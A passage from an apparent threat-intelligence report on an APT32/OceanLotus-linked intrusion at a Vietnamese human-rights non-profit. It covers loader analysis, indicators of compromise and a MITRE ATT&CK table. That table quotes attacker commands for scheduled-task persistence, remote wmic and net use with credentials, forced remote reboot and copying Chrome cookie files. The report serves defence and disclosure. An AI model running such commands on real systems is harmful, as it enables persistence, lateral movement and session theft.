reported by\r\nESET.\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 12 of 29\n\nFigure 12: Disassembly: View of unused JMP and junk code\r\nFigure 13: Disassembly: View of Failure to Disassemble junk code and getting pointer to DLL export\r\ndirectory.\r\nThis malware looks at the DLLs loaded and their exports so that it can dynamically resolve APIs used to facilitate\r\ndecryption and injection of a payload into memory. This has significant overlap with malware reported by\r\nBlackBerry/Cylance called Steganography Loader #2.\r\nAnalysis revealed that this DLL would ultimately read in iisexpressshim.sdb, decrypt it using an XOR key of 0xFF, and\r\nthen decompress the data using the LZNT1 compression algorithm. The decrypted iisexpressshim.sdb file showed more\r\ninstances of junk op-codes being present which would never be evaluated.\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 13 of 29\n\nFigure 14: Disassembly: View of more junk code from iisexpressshim.sdb\r\nThe decrypted DLL in memory would then load logo.png, use a custom steganography routine, and then make a call to the\r\nWindows CryptDecrypt API to decrypt and load the final DLL into memory. The use of a custom steganography routine to\r\nhide malicious code in a seemingly benign PNG file, in addition to use of a XOR key and compression, has overlap with the\r\npreviously mentioned Steganography Loader used by APT32/OceanLotus. It’s noted that there were a number of differences\r\nbetween this version of the Steganography Loader and the one previously reported which included use of LZNT1 instead of\r\nLZMA, and a hardcoded XOR key of 0xFF instead of it being retrieved from a file on disk.\r\nThe malware also had significant overlap with a sample analyzed by a security researcher back in March of 2019, and it’s\r\nhighly likely both malware samples are from the same malware family. At the time of investigation, the host had active\r\nconnections to 185.198.57[.]184 and 185.43.220[.]188 on port 8888 from the DllHost process running the COM object\r\nbackdoor. \r\nPassive DNS information for the IP address 185.198.57[.]184 showed that domains mentioned in the security researcher’s\r\nblog from 2019 resolved to this IP address. This helps to validate that the malware described in their blog is the same\r\nmalware found on this system 5 years later. It’s also worth mentioning that none of the domains appear to have lapsed or\r\nhave been re-registered, and the domains were all originally registered in late 2017. This indicates that the below domains\r\nhave likely been under control of the same threat actor for almost 7 years.\r\ncdn.arlialter[.]com - Domain originally registered: 2017-10-27\r\nfbcn.enantor[.]com - Domain originally registered: 2017-10-27\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 14 of 29\n\nww1.erabend[.]com - Domain originally registered: 2017-10-27\r\nvar.alieras[.]com - Domain originally registered: 2017-10-27\r\nThe domains also appear to masquerade as legitimate domains, which is notable given APT32/OceanLotus has previously\r\nused this technique throughout their intrusions.\r\nDomain Legitimate Domain\r\nalieras[.]com alier[.]com\r\nenantor[.]com emantor[.]com\r\nerabend[.]com erbend[.]com\r\nThe host was also found to have another four scheduled tasks which were masquerading as various services with identical\r\ndescriptions. These tasks had a similar naming convention to previously seen scheduled tasks. In addition, a user run key\r\nalso had a similar naming convention:\r\nScheduled Task 1\r\nTask Path: Microsoft Compatibility Appraiser_{8BCC608C-CE2C-475E-85CB-AE0EC95EAC64}\r\nDescription: Collects program telemetry information if opted-in to the Microsoft Customer Experience Improvement\r\nProgram.\r\nCOM Handler: {8BCC608C-CE2C-475E-85CB-AE0EC95EAC64}\r\nTask File Creation Date: 2020-01-14\r\nScheduled Task 2\r\nTask Path: Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template\r\nManagement (Automated)_{2A918D97-CCFE-4BE6-AB0E-D56A2E3F503D}\r\nDescription: Updates the AD RMS rights policy templates for the user. This job does not provide a credential prompt if\r\nauthentication to the template distribution web service on the server fails. In this case, it fails silently.\r\nCOM Handler: {2A918D97-CCFE-4BE6-AB0E-D56A2E3F503D}\r\nTask File Creation Date: 2019-08-13\r\nScheduled Task 3\r\nTask Path: AD RMS Rights Policy Template Management (Automated)_{2A918D97-CCFE-4BE6-AB0E-D56A2E3F503D}\r\nDescription: Updates the AD RMS rights policy templates for the user. This job does not provide a credential prompt if\r\nauthentication to the template distribution web service on the server fails. In this case, it fails silently.\r\nCOM Handler: {2A918D97-CCFE-4BE6-AB0E-D56A2E3F503D}\r\nTask File Creation Date: 2019-08-13\r\nScheduled Task 4\r\nTask Path: Microsoft\\Windows\\Active Directory Rights Management Services Client\\AD RMS Rights Policy Template\r\nManagement (Automated)_{2A918D97-CCFE-4BE6-AB0E-D56A2E3F503D}\r\nDescription: Updates the AD RMS rights policy templates for the user. This job does not provide a credential prompt if\r\nauthentication to the template distribution web service on the server fails. In this case, it fails silently.\r\nCOM Handler: {2A918D97-CCFE-4BE6-AB0E-D56A2E3F503D}\r\nTask File Creation Date: 2019-08-13\r\nNote: This scheduled task is identical to another scheduled task created except it has the control character 0x9d at the end of\r\nit.\r\nRun Key 1\r\nRegistry Key: HKU\\\u003cSID\u003e\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nName: DropboxUpdate_{02594FE8-1152-E41E-A75E-923494C7B453}\r\nPath: c:\\users\\\u003cREDACTED\u003e\\appdata\\roaming\\microsoft\\installer\\{02594fe8-1152-e41e-a75e-923494c7b453}\\dropboxupdate.exe\r\nCommand: C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Installer\\{02594FE8-1152-E41E-A75E-923494C7B453}\\DropboxUpdate.exe /installsource taggedmi\r\nBinary Creation Date: 2019-11-14\r\nExamining host 1’s scheduled tasks found another two instances of the malicious COM backdoor registered. These would no\r\nlonger run the malicious code hidden within logo.png as the required malicious iisutil2.dll had been removed from the\r\nsystem. It’s suspected that multiple variants of the backdoor were established on the system over time to help ensure access\r\nremained even if AV products picked up on some of the existing backdoors.\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 15 of 29\n\nAmongst the scheduled tasks was a DropboxUpdate task pointing to a legitimate executable. Although DropboxUpdate\r\ndoesn’t directly import and use goopdate.dll, this is indirectly called and loaded by DropboxUpdate which is then used to\r\nload a malicious DropboxUpdate.bin file in the same directory as shown below in Figure 15.\r\nFigure 15: ProcMon view of process activity\r\nAnalysis of process memory found multiple domains and C2 configuration details for this malware:\r\nFigure 16: View of DropboxUpdate.exe process’ memory\r\nThese domains once again masqueraded as legitimate domains.\r\nDomain Legitimate Domain\r\npopfan[.]com Various\r\nsetalz[.]com setabz[.]com\r\nriceaub[.]com riceau[.]com\r\neatherurg[.]com ethereum[.]org\r\nThe malicious DLL goopdate.dll is more than 20MB in size and makes a check for a hardcoded GUID environment\r\nvariable on the system. If it’s not present it will be set. This is done before setting memory permissions to RWX to allow\r\ninjecting the .bin payload into memory.\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 16 of 29\n\nFigure 17: Disassembly: View of Injection of .bin payload\r\nOf note is that this DLL has a function at offset 0x0001010 which uses a hardcoded list of names in this injection routine.\r\nSpecifically, it will take the last name in the array and concatenate it with all the other names which is then evaluated prior\r\nto injection.\r\nFigure 18: Disassembly: View of hardcoded list of names in injection routine\r\nNo specific overlaps were seen with previously reported malicious goopdate.dll files used by APT32/OceanLotus. Despite\r\nthis Facebook, Cybereason, and Volexity have all previously reported the use of APT32/OceanLotus using a malicious\r\ngoopdate.dll which was loaded into a benign executable. It’s worth noting that this technique and DLL name is also used\r\namongst other threat actors.\r\nExamining the JAR files adobe.jar and msadobe.jar found these to be simple loaders that would run specific embedded\r\nDLLs into memory from a main class called UpdateData.\r\nFigure 19: View of embedded DLL mi54giwp.dll\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 17 of 29\n\nFigure 20: View of embedded DLL zfhqq01v.dll in decompiled msadobe.jar\r\nFigure 21: View of code of UpdateData\r\nLooking at the DLL mi54giwp.dll found it would create a Mutex with the value okSSjZzAlnNOlQaGoDWx prior to\r\ntargeting a .bin file located within a directory hardcoded into the DLL. This highlights the malware had been created\r\nspecifically to target the system it was run on. \r\nFigure 22: Disassembly of mi54giwp.dll, which shows creation of Mutex\r\nFigure 23: View of hardcoded file paths by mi54giwp.dll\r\nSimilar behavior was found on the the DLL zfhqq01v.dll which creates a Mutex with the value\r\nsbvjJpGLbbmnHNfWEetm prior to targeting a .bin file located within a different user account directory hardcoded into\r\nthe DLL.\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 18 of 29\n\nFigure 24: Disassembly of zfhqq01v.dll, which shows Mutex creation\r\nWhilst examining host 1 it was found that persistence had previously been set up to run a suspicious executable from a user\r\nrun key. This executable was quarantined by Windows Defender.\r\nRun Key 2\r\nRegistry Key: HKU\\\u003cSID\u003e\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\r\nName: Trusted Platform Console\r\nCommand: C:\\Users\\\u003cREDACTED\u003e\\AppData\\Local\\TPM Console\\TpmInit.exe\r\nOf note is that the “TPM Console” directory had three files in it with varying modification timestamps which are of interest\r\nwhen it comes to timelining this incident.\r\nFile Modification Timestamp\r\nTpmInit.db \u003cREDACTED\u003e\r\nTpmInit.mdb 2017-02-07 23:54:29\r\nTpmInit.mdf 2017-02-07 23:54:29\r\nAnalysis of the quarantined TpmInit.exe found that this was a modified version of a legitimate TpmInit executable. This\r\nexecutable when initially run will create two files TpmInit.mdb and TpmInit.mdf on disk if they’re not present before\r\nterminating, at which point these files will no longer be modified.\r\nFigure 25: Analysis of TpmInit.exe, showing creation of TpmInit.mdf and TpmInit.mdb\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 19 of 29\n\nFigure 26: Differences between TpmInit.mdf and TpmInit.mdb\r\nAlthough it’s unknown whether this executable was related to the same intrusion, modification timestamps indicate this\r\nmalware may have been present and running on the host since 2017. If both TPMInit.mdb and TPMInit.mdf are present\r\nwhen the executable is run, TpmInit.db (a DLL) is dropped from TpmInit.exe and run using rundll32.exe after first\r\ninjecting into another rundll32 process. This file will have its modification timestamp change every time the executable is\r\nrun, indicating a potential first and last time this malware was executed on the system.\r\nTo execute TpmInit.db, the malware leverages the legitimate rundll32 application to run an exported function called\r\n‘TpmVCardCreate’. It’s worth noting that the exports in this DLL are named after a subset of exports found in a legitimate\r\ntpmvsc.dll usually found on Windows.\r\nFigure 27: Export Table of TpmInit.db, showing the TpmVCardCreate function\r\nAfter execution, this would get a handle to kernel32.dll to get the address of modules to be used and check to see if\r\nKaspersky AV was running on the system (avp.exe) and avg (avghookx.dll) as seen in Figure 28.\r\nFigure 28: Analysis showing check for Kaspersky AV\r\nLater on, this opens a handle to explorer.exe, creates a new thread, and injects the contents of a file on disk at C:\\Users\\\r\n\u003cusername\u003e\\AppData\\Roaming\\Microsoft\\MicrosoftEdge\\container.dat into memory. At the time of investigation, this file\r\nwasn’t found on disk.\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 20 of 29\n\nFigure 29: Analysis showing check for container.dat\r\nAnalysis of Infrastructure\r\nExamining the two suspected Cobalt Strike Team Server IP addresses found that both were signed with Let’s Encrypt\r\ncertificates and were sitting behind a Cloudflare Load Balancer. Of interest is that the servers would present a 404 Not\r\nFound message with a Content-Length of 0 whenever a GET request with a URI containing a ‘/’ was sent. The servers\r\nwould also present a 200 response with a Content-Length of 0, and the allowed methods OPTIONS, GET, HEAD, POST\r\nwhenever an OPTIONS request was sent. This is significant because the same behavior is expected when you’re interacting\r\nwith a Cobalt Strike Team Server as previously reported by Palo Alto Networks.\r\nThe combination of specific response headers and Cloudflare Load Balancer lead to a unique service banner which was seen\r\nacross both of the suspected Cobalt Strike C2 IP addresses through a Censys search, seen in Figure 30.\r\nFigure 30: Service banner seen on Censys for 51.81.29[.]44\r\nFigure 31: Service banner seen on Censys for 5.230.35[.]192\r\nA search for this banner found only seven hosts making this a fairly unique fingerprint. Looking for only hosts that were\r\nidentified by both a name and an IP address found three unique IP addresses and domains, of which only one hadn’t been\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 21 of 29\n\nseen in this intrusion.\r\nFigure 32: Analysis of the banner hash\r\nInterestingly, all of these IP addresses had domain names which looked to be masquerading as legitimate websites or\r\nsoftware, and none of the ASNs or service providers overlapped.\r\nTargeting and Attribution\r\nIt’s long been reported that journalists, bloggers, dissidents, and Vietnamese human rights advocates have been targeted by\r\nmalware and tactics consistent with APT32/OceanLotus operations dating back to at least 2013. This has been reported by\r\ncompanies such as Google, the Electronic Frontier Foundation, Amnesty International, and a large number of other security\r\nvendors. During our investigation a number of overlaps were found between known techniques used by APT32/OceanLotus,\r\nthe target verticals and interests of this threat actor, and what was found in this intrusion:\r\nThe target was a non-profit supporting Vietnamese human rights\r\nThe malware in question used a malicious DLL which was loaded by an IIS Express DLL named iisutil.dll. This has\r\noverlap with a YARA rule created by Nextron Systems that points towards the threat actor APT32/OceanLotus.\r\nThe malicious DLL used in this intrusion used a modified version of iisutil with the entry point 0x00025FB0\r\n(155568) and a function at 0x1002711e. All code in the malware is identical to malware uploaded to VirusTotal noted\r\nto be associated with APT32/OceanLotus besides extra padding appended to it.\r\nPort 8888 and 8531 were used within the malware C2 configuration. The COM object backdoor aligns with public\r\nreporting by a security researcher from 2019 where the final payload contained eight possible C2 server addresses\r\nwith identical port numbers. \r\nThe use of hardcoded C2 addresses in a DLL resource has known overlap with malware used by APT32/OceanLotus\r\nas reported by BlackBerry/Cylance.\r\nThe use of COM objects and Steganography using PNG files is a known technique reported to be used by\r\nAPT32/OceanLotus as reported by BlackBerry/Cylance.\r\nAlternate Data Streams with the name log.txt were appended to a PowerShell script and loaded by wscript through a\r\nscheduled task. This has a naming convention similar to a publicly reported campaign attributed to\r\nAPT32/OceanLotus ‘Operation Cobalt Kitty’ by Cybereason.\r\nCobalt Strike is suspected to have been used by the threat actor by loading a malicious DLL into a legitimate\r\nexecutable, a known technique used by APT32/OceanLotus.\r\nFacebook, Cybereason, and Volexity have all reported the use of APT32/OceanLotus using a malicious goopdate.dll\r\nloading into a benign executable.\r\nAPT32/OceanLotus has been known to use unique CLSIDs, Binary Padding, compression, and Scheduled Tasks in\r\ntheir intrusions as reported by ESET. The naming conventions used in their malware is also similar.\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 22 of 29\n\nAPT32/OceanLotus has been known to use lots of unique domains and infrastructure with minimal overlap to help\r\nremain in environments for long periods of time which aligns with what we’ve seen here.\r\nAPT32/OceanLotus has been known to incorporate Java-based malware into their operations.\r\nAPT32/OceanLotus has previously used garbage op-codes in their malware to throw off analysis, and control flow\r\nobfuscation as reported by ESET.\r\nAPT32/OceanLotus has previously used the McAfee OEM module to sideload malicious dll’s as reported by ESET.\r\nAPT32/Oceanlotus has previously used Cobalt Strike servers behind Cloudflare as reported by Cybereason and\r\nVolexity\r\nAPT32/OceanLotus has previously used the Apple Software Update binary to sideload malicious dll’s as reported by\r\nRecorded Future.\r\nAPT32/OceanLotus has previously heavily used Let’s Encrypt TLS certificates in its infrastructure as reported by\r\nVolexity.\r\nIndicators of Compromise\r\nIndicator Type Details\r\nmsadobe.jar SHA256 300ef93872cc574024f2402b5b899c834908a0c7da70477a3aeeaee2e458a891\r\n1lpiozkc.node SHA256 b31bfa8782cb691178081d6685d8429a2a2787b1130c6620d3486b4c3e02d441\r\nms-adobe.bin SHA256 8e2e9e7b93f4ed67377f7b9df9523c695f1d7e768c3301db6c653948766ff4c3\r\n1.bat SHA256 1bd17369848c297fb30e424e613c10ccae44aa0556b9c88f6bf51d84d2cbf327\r\n1.txt SHA256 6cf19d0582c6c31b9e198cd0a3d714b397484a3b16518981d935af9fd6cdb2eb\r\nlogo.png SHA256 f8773628cdeb821bd7a1c7235bb855e9b41aa808fed1510418a7461f7b82fd6c\r\ngoopdate.dll SHA256 c03cc808b64645455aba526be1ea018242fcd39278acbbf5ec3df544f9cf9595\r\nlogo.png SHA256 aa69c6c22f1931d90032a2d825dbee266954fac33f16c6f9ce7714e012404ec1\r\nadobe.png SHA256 a6072e7b0fafb5f09fd02c37328091abfede86c7c8cb802852985a37147bfa19\r\niisexpressshim.sdb SHA256 09f53e68e55a38c3e989841f59a9c4738c34c308e569d23315fd0e2341195856\r\ncachuri.dll SHA256 aa5ff1126a869b8b5a0aa72f609215d8e3b73e833c60e4576f2d3583cc5af4f4\r\nDropboxUpdate.bin SHA256 c7e2dbc3df04554daa19ef125bc07a6fa52b5ea0ba010f187a082dc9fc2e97ed\r\niisexpressshim.sdb SHA256 a217fe01b34479c71d3a7a524cb3857809e575cd223d2dd6666cdd47bd286cd6\r\nadobe.jar SHA256 efc373b0cda3f426d25085938cd02b7344098e773037a70404c6028c76cc16fc\r\nMSSharePoint.vbs SHA256 6c08a004a915ade561aee4a4bec7dc588c185bd945621ec8468575a399ab81f4\r\ncloud.bat SHA256 ea8a00813853038820ba50360c5c1d57a47d72237e3f76c581d316f0f1c6e85f\r\nlogo.png SHA256 82e94417a4c4a6a0be843ddc60f5e595733ed99bbfed6ac508a5ac6d4dd31813\r\niisutil2.dll SHA256 47af8a33aac2e70ab6491a4c0a94fd7840ff8014ad43b441d01bfaf9bf6c4ab7\r\nSoftwareUpdate.exe SHA256 a166751b82eac59a44fd54cf74295e71e7e95474fc038fc8cca069da05158586\r\nWdiservicehost.exe  \r\n(renamed mcoemcpy.exe)\r\nSHA256 3124fcb79da0bdf9d0d1995e37b06f7929d83c1c4b60e38c104743be71170efe\r\nTpmInit.exe SHA256 29863f612d2da283148cb327a1d57d0a658d75c8e65f9ef4e5b19835855e981e\r\n51.81.29[.]44 IP\r\nDNS: kpi.adcconnect[.]me  \r\nASN: OVH SAS\r\n5.230.35[.]192 IP\r\nDNS: dupbleanalytics[.]net  \r\nDNS: get.dupbleanalytics[.]net  \r\nNS: 3-get.njalla[.]fo  \r\nNS: 2-can.njalla[.]in  \r\nNS: 1-you.njalla[.]no  \r\nSOA: you.can-get-no[.]info  \r\nASN: GHOSTnet GmbH\r\n185.198.57[.]184 IP DNS: fbcn.enantor[.]com  \r\nDNS: cdn.arlialter[.]com  \r\nDNS: ww1.erabend[.]com  \r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 23 of 29\n\nIndicator Type Details\r\nDNS: var.alieras[.]com\r\nASN: Host Sailor Ltd\r\n185.43.220[.]188 IP ASN: WIBO Baltic UAB\r\n193.107.109[.]148 IP DNS: base.msteamsapi[.]com\r\n46.183.223[.]79 IP\r\nDNS: cds55[.]lax8[.]setalz[.]com\r\nDNS: hx-in-f211[.]popfan[.]org\r\nDNS: adobe[.]riceaub[.]com\r\n176.103.63[.]48 IP\r\nDNS: priv[.]manuelleake[.]com\r\nDNS: blank[.]eatherurg[.]com\r\nhx-in-f211[.]popfan[.]org Domain A: 46.183.223[.]79\r\ncds55[.]lax8[.]setalz[.]com Domain A: 46.183.223[.]79\r\nadobe[.]riceaub[.]com Domain A: 46.183.223[.]79\r\npriv[.]manuelleake[.]com Domain A: 176.103.63[.]48\r\nblank[.]eatherurg[.]com Domain A: 176.103.63[.]48\r\ncdn.arlialter[.]com Domain 185.198.57[.]184\r\nfbcn.enantor[.]com Domain 185.198.57[.]184\r\nww1.erabend[.]com Domain 185.198.57[.]184\r\nvar.alieras[.]com Domain 185.198.57[.]184\r\nMITRE ATT\u0026CK Mapping\r\nIndicator MITRE ATT\u0026CK Note\r\nwhoami /priv\r\nT1033: System\r\nOwner/User\r\nDiscovery\r\nschtasks  /create /sc minute /mo 300 /tn Handler{60396-307392-03497-03790-\r\n3702046} /tr \"C:\\Users\\\r\n\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Windows\\CloudStore\\cloud.bat\" /f\r\nT1053.005:\r\nScheduled Task/Job:\r\nScheduled Task\r\ncmd.exe /c C:\\Users\\Public\\Downloads\\1.bat\r\nT1059.003:\r\nCommand and\r\nScripting\r\nInterpreter:\r\nWindows Command\r\nShell\r\n T1047: Windows\r\nManagement\r\nInstrumentation\r\nT1057: Process\r\nDiscovery\r\n1.bat was being launched via Windo\r\nManagement Instrumentation to enu\r\nprocesses\r\nnet  group \"Domain Admins\" /domain\r\nT1087.002:\r\nAccount Discovery:\r\nDomain Account\r\n T1069.002:\r\nPermission Groups\r\nDiscovery: Domain\r\nGroups\r\nnltest  /dclist:\u003cREDACTED\u003e.local\r\nT1018: Remote\r\nSystem Discovery\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 24 of 29\n\nIndicator MITRE ATT\u0026CK Note\r\nschtasks  /create /sc MINUTE /mo 300 /tn\r\n\"Microsoft\\Windows\\WindowsColorSystem\\Calibration_Update\" /tr \"C:\\Users\\\r\n\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\SPMigration\\Bin\\Calibre.exe\" /f\r\nT1053.005:\r\nScheduled Task/Job:\r\nScheduled Task  \r\n T1574.002: Hijack\r\nExecution Flow:\r\nDLL Side-Loading  \r\n T1036.004:\r\nMasquerading:\r\nMasquerade Task or\r\nService  \r\n T1036.005:\r\nMasquerading:\r\nMatch Legitimate\r\nName or Location\r\ncmd.exe /c echo a0e3d8a67d0 \u003e \\.\\pipe\\a64009\r\nT1134.001: Access\r\nToken\r\nManipulation:\r\nToken\r\nImpersonation/Theft\r\n T1559: Inter-Process\r\nCommunication\r\nwmic  /node:\u003cREDACTED\u003e /user:\u003cREDACTED\u003e /password:\u003cREDACTED\u003e process\r\ncall create \"cmd.exe /c start c:\\Users\\\r\n\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\SPMigration\\Bin\\calibre.exe\"\r\nT1047: Windows\r\nManagement\r\nInstrumentation\r\nT1078.002: Valid\r\nAccounts: Domain\r\nAccounts\r\ncmd /c shutdown /r /m \\\\\u003cREDACTED\u003e /t 0 /f\r\nT1529: System\r\nShutdown/Reboot\r\nipconfig /all\r\nT1016: System\r\nNetwork\r\nConfiguration\r\nDiscovery\r\nnet view\r\nT1135: Network\r\nShare Discovery\r\nnet use\r\nT1021.002: Remote\r\nServices:\r\nSMB/Windows\r\nAdmin Shares\r\nnetstat -ano\r\nT1049: System\r\nNetwork\r\nConnections\r\nDiscovery\r\nschtasks  /create /sc MINUTE /mo 15 /tn \"96d09a49-98ed-4b12-936a-c8715d2d2c0e\"\r\n/tr \"C:\\Users\\\u003cREDACTED\u003e\\Appdata\\Roaming\\Adobe\\bin\\javaw.exe -jar C:\\Users\\\r\n\u003cREDACTED\u003e\\Appdata\\Roaming\\Adobe\\msadobe.jar zfhqq01v\" /f\r\nT1053.005:\r\nScheduled Task/Job:\r\nScheduled Task  \r\n T1036.005:\r\nMasquerading:\r\nMatch Legitimate\r\nName or Location\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 25 of 29\n\nIndicator MITRE ATT\u0026CK Note\r\nnet  view \\\\\u003cREDACTED\u003e /all\r\nT1135: Network\r\nShare Discovery\r\nnet  use \\\\\u003cREDACTED\u003e /u:\u003cREDACTED\u003e \u003cREDACTED\u003e\r\nT1021.002: Remote\r\nServices:\r\nSMB/Windows\r\nAdmin Shares\r\nT1078.002: Valid\r\nAccounts: Domain\r\nAccounts\r\ncmd /c for /f \"tokens=*\" %G in ('dir /b \"%localappdata%\\Google\\Chrome\\User\r\nData\\Profile *\"') do copy \"%localappdata%\\Google\\Chrome\\User\r\nData%G\\Network\\Cookies.bak\" \"%localappdata%\\Google\\Chrome\\User\r\nData%G\\Cookies\" /y\r\nT1555.003:\r\nCredentials from\r\nPassword Stores:\r\nCredentials from\r\nWeb Browsers\r\nT1539: Steal Web\r\nSession Cookie\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Microsoft Compatibility\r\nAppraiser\\{8BCC608C-CE2C-475E-85CB-AE0EC95EAC64}\\cachuri.dll\r\nT1546.015: Event\r\nTriggered\r\nExecution:\r\nComponent Object\r\nModel Hijacking\r\nT1559.001: Inter-Process\r\nCommunication:\r\nComponent Object\r\nModel  \r\n T1036.004:\r\nMasquerading:\r\nMasquerade Task or\r\nService  \r\n T1036.005:\r\nMasquerading:\r\nMatch Legitimate\r\nName or Location\r\nHKU\\Software\\Classes\\WOW6432N\r\n{8BCC608C-CE2C-475E-85CB-AE0EC95EAC64}\\InProcServer32\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\UpdateLibrary\\{1F7CFAF8-\r\nB558-4EBD-9526-203135A79B1D}\\cachuri.dll\r\nT1546.015: Event\r\nTriggered\r\nExecution:\r\nComponent Object\r\nModel Hijacking\r\nT1559.001: Inter-Process\r\nCommunication:\r\nComponent Object\r\nModel  \r\n T1036.004:\r\nMasquerading:\r\nMasquerade Task or\r\nService  \r\n T1036.005:\r\nMasquerading:\r\nMatch Legitimate\r\nName or Location\r\nHKU\\Software\\Classes\\WOW6432N\r\n{1F7CFAF8-B558-4EBD-9526-\r\n203135A79B1D}\\InProcServer32\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\AD RMS Rights Policy\r\nTemplate Management (Automated)\\{2A918D97-CCFE-4BE6-AB0E-D56A2E3F503D}\\cachuri.dll\r\nT1546.015: Event\r\nTriggered\r\nExecution:\r\nHKU\\Software\\Classes\\WOW6432N\r\n{2A918D97-CCFE-4BE6-AB0E-D56A2E3F503D}\\InProcServer32\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 26 of 29\n\nIndicator MITRE ATT\u0026CK Note\r\nComponent Object\r\nModel Hijacking\r\n T1559.001: Inter-Process\r\nCommunication:\r\nComponent Object\r\nModel  \r\n T1036.004:\r\nMasquerading:\r\nMasquerade Task or\r\nService  \r\n T1036.005:\r\nMasquerading:\r\nMatch Legitimate\r\nName or Location\r\nc:\\users\\\u003cREDACTED\u003e\\appdata\\roaming\\microsoft\\installer\\{02594fe8-1152-e41e-a75e-923494c7b453}\\dropboxupdate.exe\r\nT1547.001: Boot or\r\nLogon Autostart\r\nExecution: Registry\r\nRun Keys / Startup\r\nFolder  \r\n T1574.002: Hijack\r\nExecution Flow:\r\nDLL Side-Loading\r\nDropboxUpdate_{02594FE8-1152-E\r\n923494C7B453}\r\nc:\\windows\\sysnative\\gpupdate.exe\r\nT1055: Process\r\nInjection\r\nCobalt Strike uses a Fork and Run m\r\ninject into gpupdate.exe\r\nC:\\programdata\\adobe\\node.exe -e require('C:\\ProgramData\\adobe\\1lpiozkc.node')\r\nT1218.007: System\r\nBinary Proxy\r\nExecution:\r\nJavaScript\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\UpdateLibrary\\{1F7CFAF8-\r\nB558-4EBD-9526-203135A79B1D}\\iisutil2.dll\r\nT1027.001:\r\nObfuscated Files or\r\nInformation: Binary\r\nPadding\r\nT1129: Shared\r\nModules\r\nT1027.007:\r\nObfuscated Files or\r\nInformation:\r\nDynamic API\r\nResolution\r\nT1027.013:\r\nObfuscated Files or\r\nInformation:\r\nEncrypted/Encoded\r\nFile  \r\n T1036.004:\r\nMasquerading:\r\nMasquerade Task or\r\nService  \r\n T1036.005:\r\nMasquerading:\r\nMatch Legitimate\r\nName or Location\r\nhttps://www.huntress.com/blog/advanced-persistent-threat-targeting-vietnamese-human-rights-defenders\r\nPage 27 of 29\n\nIndicator MITRE ATT\u0026CK Note\r\nC:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Microsoft Compatibility\r\nAppraiser\\{8BCC608C-CE2C-475E-85CB-AE0EC95EAC64}\\iisexpressshim.sdb\r\n C:\\Users\\\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\UpdateLibrary\\{1F7CFAF8-\r\nB558-4EBD-9526-203135A79B1D}\\logo.png\r\nT1027.003:\r\nObfuscated Files or\r\nInformation:\r\nSteganography  \r\n T1036.008:\r\nMasquerading:\r\nMasquerade File\r\nType\r\nMasqueraded as a legitimate sdb file\r\non extension\r\nC:\\Users\\\r\n\u003cREDACTED\u003e\\AppData\\Roaming\\Microsoft\\Windows\\CloudStore\\MSSharePoint.vbs\r\nT1105: Ingress Tool\r\nTransfer\r\nT1059.005:\r\nCommand and\r\nScripting\r\nInterpreter: Visual\r\nBasic\r\nVBS script was used to download fi\r\nremote C2 server over SSH\r\nC:\\Users\\\r\n\u003cREDACTED\u003e\\AppData\\Roaming\\WdiServiceHost_339453944\\WdiServiceHost.exe\r\nT1574.002: Hijack\r\nExecution Flow:\r\nDLL Side-Loading  \r\n T1036.004:\r\nMasquerading:\r\nMasquerade Task or\r\nService  \r\n T1036.005:\r\nMasquerading:\r\nMatch Legitimate\r\nName or Location\r\nC:\\ProgramData\\Apple\\Installer Cache\\SoftwareUpdate.exe\r\nT1574.002: Hijack\r\nExecution Flow:\r\nDLL Side-Loading  \r\n T1036.004:\r\nMasquerading:\r\nMasquerade Task or\r\nService\r\nService: Adobe_Reader\r\nT1543.003: Create\r\nor Modify System\r\nProcess: Windows\r\nService\r\nTpmInit.exe\r\nT1218.011: System\r\nBinary Proxy\r\nExecution:\r\nRundll32  \r\nT1036.005:\r\nMasquerading:\r\nMatch Legitimate\r\nName or Location\r\nTpmInit.exe launched and executed\r\nDLL through the use of Rundll32.ex\r\n51.81.29[.]44\r\nT1573.002:\r\nAsymmetric\r\nCryptography\r\nInfrastructure behind IP addresses us\r\nCobalt Strike leverage TLS certifica\r\ntraffic\r\n51.81.29[.]44\r\ncdn.arlialter[.]com\r\nfbcn.enantor[.]com\r\nww1.erabend[.]com\r\nvar.alieras[.]com\r\nT1583.004: 